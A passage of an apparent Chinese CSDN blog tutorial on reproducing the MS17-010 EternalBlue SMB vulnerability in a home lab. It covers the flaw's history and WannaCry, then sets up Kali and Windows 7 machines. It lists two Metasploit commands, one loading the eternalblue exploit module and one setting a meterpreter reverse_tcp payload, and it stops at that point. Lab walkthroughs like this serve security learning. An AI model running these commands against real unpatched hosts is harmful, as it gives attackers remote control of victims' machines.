(ms17-010)永恒之蓝漏洞的复现

本文详细介绍了永恒之蓝漏洞的背景,它如何利用Windows系统的SMB漏洞进行攻击。攻击者无需用户交互,只需目标机器开启445端口且未打补丁。文中还提供了复现攻击的步骤,包括环境准备、攻击机和靶机配置,并通过Metasploit框架演示了攻击过程,成功获取Meterpreter会话,展示了漏洞利用的全过程。
摘要由CSDN通过智能技术生成

一、什么是永恒之蓝
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
二、攻击方式
恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
三、漏洞复现
1.环境准备
攻击机:kali IP:192.168.0.105
靶机:win7 IP:192.168.0.103
注意靶机要开放445端口,没有打永恒之蓝的补丁,同时关闭防火墙
查看靶机是否开放445端口
在这里插入图片描述
利用metasploit的已有模块进行攻击

use exploit/windows/smb/ms17_010_eternalblue

在这里插入图片描述
设置攻击的payload

set payload windows/x64/meterpreter/reverse_tcp
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值